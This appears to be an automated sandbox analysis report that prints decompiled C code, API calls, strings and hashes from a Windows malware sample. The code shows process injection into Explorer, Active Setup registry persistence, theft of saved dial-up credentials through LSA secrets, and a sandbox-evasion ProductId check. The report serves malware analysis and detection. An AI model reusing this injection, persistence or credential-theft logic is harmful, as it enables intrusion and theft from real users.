                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004063FA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
				void* _v8;
				void* _t8;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t29;
				intOrPtr _t37;
				long _t43;
				intOrPtr _t47;
				intOrPtr _t49;

				_t47 = _t49;
				_t29 = __edx;
				_t43 = __eax;
				E00401AC0(__edx);
				_t8 = OpenProcess(0x410, 0, _t43);
				_v8 = _t8;
				if(_v8 == 0) {
					return _t8;
				} else {
					_push(_t47);
					_push(0x4064a9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t49;
					E00402074(_t29, 0x104);
					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
					_push(0x104);
					_push(E00401F48( *_t29));
					_push(0);
					_push(_v8);
					if( *_t13() <= 0) {
						E00401AC0(_t29);
					} else {
						E00402074(_t29, E004063EC(E00401F48( *_t29)));
					}
					_pop(_t37);
					 *[fs:eax] = _t37;
					_push(0x4064b0);
					return CloseHandle(_v8);
				}
			}











                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404460, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				void* _t8;
				struct HRSRC__* _t15;
				void* _t16;
				long _t22;
				void* _t24;

				_t24 = __eax;
				_t2 =  *0x40e670; // 0x400000
				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
				_t4 =  *0x40e670; // 0x400000
				_t22 = SizeofResource(_t4, _t15);
				_t6 =  *0x40e670; // 0x400000
				_t16 = LoadResource(_t6, _t15);
				_t8 = LockResource(_t16);
				_t23 = _t8;
				if(_t8 != 0) {
					E00402074(_t24, _t22 - 1);
					E00403730(E00401F9C(_t24), _t23);
					return FreeResource(_t16);
				}
				return _t8;
			}











                                    0x00404464
                                    0x0040446d
                                    0x00404478
                                    0x0040447b
                                    0x00404486
                                    0x00404489
                                    0x00404494
                                    0x00404497
                                    0x0040449c
                                    0x004044a0
                                    0x004044a7
                                    0x004044b7
                                    0x00000000
                                    0x004044bd
                                    0x004044c6

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405334, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405334() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}







                                    0x0040533b
                                    0x00405353
                                    0x00405355
                                    0x00405375
                                    0x00405383
                                    0x00405385
                                    0x00405385
                                    0x00405383
                                    0x0040538b
                                    0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    • ProductId, xrefs: 0040536B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004068B4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t43;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t62;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t43 = __ecx;
				_push(_t62);
				_push(0x40698a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62;
				E00401CAC( &_v16, __edx);
				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0);
				E00401CAC( &_v20, _t43);
				_t26 = E00401D50(_v20);
				_t27 =  *0x40d090; // 0x0
				_t28 = E00401D50(_t27);
				E00401CAC( &_v24, _t43);
				_t53 =  *0x40d090; // 0x0
				E00401D58( &_v24, _t53);
				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28);
				RegCloseKey(_v8);
				_pop(_t54);
				 *[fs:eax] = _t54;
				_push(E00406991);
				return E00401AE4( &_v24, 4);
			}















                                    0x004068b7
                                    0x004068b9
                                    0x004068bb
                                    0x004068bd
                                    0x004068bf
                                    0x004068c3
                                    0x004068c9
                                    0x004068ca
                                    0x004068cf
                                    0x004068d2
                                    0x004068ea
                                    0x004068fa
                                    0x0040690d
                                    0x00406917
                                    0x0040691f
                                    0x00406926
                                    0x0040692b
                                    0x00406938
                                    0x00406940
                                    0x00406946
                                    0x00406961
                                    0x0040696a
                                    0x00406971
                                    0x00406974
                                    0x00406977
                                    0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407CAC, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				union _SID_NAME_USE _v24;
				void* _v28;
				void _v284;
				char _v540;
				void* _t50;
				intOrPtr _t56;
				void* _t60;

				_v8 = 0;
				_t50 = __eax;
				_push(_t60);
				_push(0x407d81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffde8;
				E00401AC0(__eax);
				E00402074( &_v8, 0x100);
				_v12 = 0xff;
				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
					_v16 = 0xff;
					_v20 = 0xff;
					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
						_push( &_v28);
						_push( &_v284);
						L00407B54();
						E00401CAC(_t50, _v28);
						GlobalFree(_v28);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(E00407D88);
				return E00401AC0( &_v8);
			}














                                    0x00407cb8
                                    0x00407cbb
                                    0x00407cbf
                                    0x00407cc0
                                    0x00407cc5
                                    0x00407cc8
                                    0x00407ccd
                                    0x00407cda
                                    0x00407cdf
                                    0x00407cfa
                                    0x00407cfc
                                    0x00407d03
                                    0x00407d36
                                    0x00407d4b
                                    0x00407d52
                                    0x00407d53
                                    0x00407d5d
                                    0x00407d66
                                    0x00407d66
                                    0x00407d36
                                    0x00407d6d
                                    0x00407d70
                                    0x00407d73
                                    0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AFB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t49;
				void* _t55;

				_v20 = 0;
				_v16 = 0;
				_push(_t55);
				_push(0x40b062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff0;
				E004013A4(0,  &_v16);
				_t52 = E00401F48(_v16);
				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
				_t37 = OpenProcess(0x1f0fff, 0, _v8);
				E00401CAC( &_v20, _t17);
				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0040B069);
				return E00401AE4( &_v20, 2);
			}









                                    0x0040afba
                                    0x0040afbd
                                    0x0040afc2
                                    0x0040afc3
                                    0x0040afc8
                                    0x0040afcb
                                    0x0040afd3
                                    0x0040afe0
                                    0x0040aff3
                                    0x0040b008
                                    0x0040b00f
                                    0x0040b027
                                    0x0040b042
                                    0x0040b049
                                    0x0040b04c
                                    0x0040b04f
                                    0x0040b061

                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407E40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed short* _v8;
				intOrPtr _v12;
				char _v16;
				void* _t23;
				intOrPtr _t50;
				intOrPtr _t58;
				void* _t59;

				_t59 = __eflags;
				_t55 = __esi;
				_t54 = __edi;
				_t41 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t58);
				_push(0x407ef8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t58;
				_push("RasDialParams!");
				E00407CAC( &_v16, __ebx, __ecx);
				_push(_v16);
				_push(0x407f24);
				E00401E10();
				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
				_t60 = _t23;
				if(_t23 != 0) {
					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
					_push(_v8[2]);
					L00407B74();
				}
				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
					_push(_v8[2]);
					L00407B74();
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(E00407EFF);
				return E00401AE4( &_v16, 2);
			}










                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e40
                                    0x00407e43
                                    0x00407e45
                                    0x00407e47
                                    0x00407e4b
                                    0x00407e4c
                                    0x00407e51
                                    0x00407e54
                                    0x00407e57
                                    0x00407e5f
                                    0x00407e64
                                    0x00407e67
                                    0x00407e74
                                    0x00407e84
                                    0x00407e89
                                    0x00407e8b
                                    0x00407e99
                                    0x00407ea4
                                    0x00407ea5
                                    0x00407ea5
                                    0x00407ebe
                                    0x00407ecc
                                    0x00407ed7
                                    0x00407ed8
                                    0x00407ed8
                                    0x00407edf
                                    0x00407ee2
                                    0x00407ee5
                                    0x00407ef7

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405AD8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t6;
				void* _t8;
				void* _t14;
				void* _t15;

				_t14 = __ecx;
				_t15 = __edx;
				_t8 = __eax;
				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
			}







                                    0x00405ade
                                    0x00405ae0
                                    0x00405ae2
                                    0x00405af4
                                    0x00405b0e

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
